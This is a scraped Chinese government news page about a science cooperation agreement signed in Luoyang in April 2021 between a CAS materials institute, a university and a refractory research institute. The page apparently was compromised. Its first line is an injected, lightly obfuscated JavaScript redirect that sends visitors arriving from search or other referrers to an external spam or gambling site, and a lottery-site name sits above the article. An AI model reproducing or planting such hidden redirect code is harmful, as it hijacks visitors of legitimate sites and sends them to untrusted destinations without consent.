var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 市县科技

中科院上海硅酸盐研究所与驻洛高校院所科技创新战略合作成功签约


发布日期:2021-04-13 18:22来源:洛阳市科学技术局 阅读次数:

  4月10日上午,中科院上海硅酸盐研究所与驻洛高校院所科技战略合作签约仪式暨无机非金属材料论坛活动在洛阳举行。此举将进一步深化“沪豫合作”,更好汇聚高端科技创新资源,推动科技合作精准对接和科技资源有效嫁接,助力洛阳加快副中心城市建设,打造全国先进制造业基地。

  洛阳市委副书记、市长刘宛康,中科院上海硅酸盐研究所所长宋力昕,中钢股份有限公司总工程师、中钢集团洛阳耐火材料研究院有限公司名誉院长李红霞,河南科技大学党委书记崔世忠出席签约仪式并致辞。河南省科技厅副厅长夏培臣,洛阳市领导胡加彬、任丽君等出席签约活动。洛阳市科技局党组书记、副局长代伐参加签约活动并主持无机非金属材料论坛。

  中科院上海硅酸盐研究所副所长吴成铁、苏良碧,河南科技大学副校长宋克兴,中钢洛阳耐火材料研究院有限公司院长李国富代表所校企三方签署合作协议。

  按照合作协议,中国科学院上海硅酸盐研究所将与中钢洛阳耐火材料研究院有限公司共同申报研发项目,开展科技成果转移转化,联合培养高层次科技人才,共享创新平台资源,定期组织学术、技术交流和人员互访;与河南科技大学建立人才交流互聘机制和人才供需平台,联合申报政府科学技术研究项目、科研平台、研发创新团队和成果奖励,共享科研平台,合作举办学术会议,扩大双方的人才和科研合作。

  在随后举行的无机非金属材料论坛上,中科院上海硅酸盐研究所副所长吴成铁研究员、中科院透明光功能无机材料重点实验室主任王士维研究员,分别以“3D打印生物医用仿生材料”“透明陶瓷研究新进展”为题作了专题报告。中科院上海硅酸盐研究所还就有关科研成果进行了推介,并就“钙钛矿太阳能电池产业化”项目进行了路演。

  中科院上海硅酸盐研究所是国内无机非金属材料领域的科学权威,经过90多年的发展,已发展成为集材料前沿探索、高技术创新、应用发展研究于一体的一流科研机构,形成了“基础研究—应用研究—工程化、产业化研究”有机结合的较为完备的科研体系,为材料科学基础理论和工程技术发展,为国家安全、国民经济建设作出了重要贡献。该所拥有专业技术人员682人,其中中国科学院院士2名、中国工程院院士3名,累计取得科技成果近1200项,获得国家、中国科学院、上海市等省部级以上各类科技奖项423项,其中国家发明奖30项,国家自然科学奖9项,国家科技进步奖16项。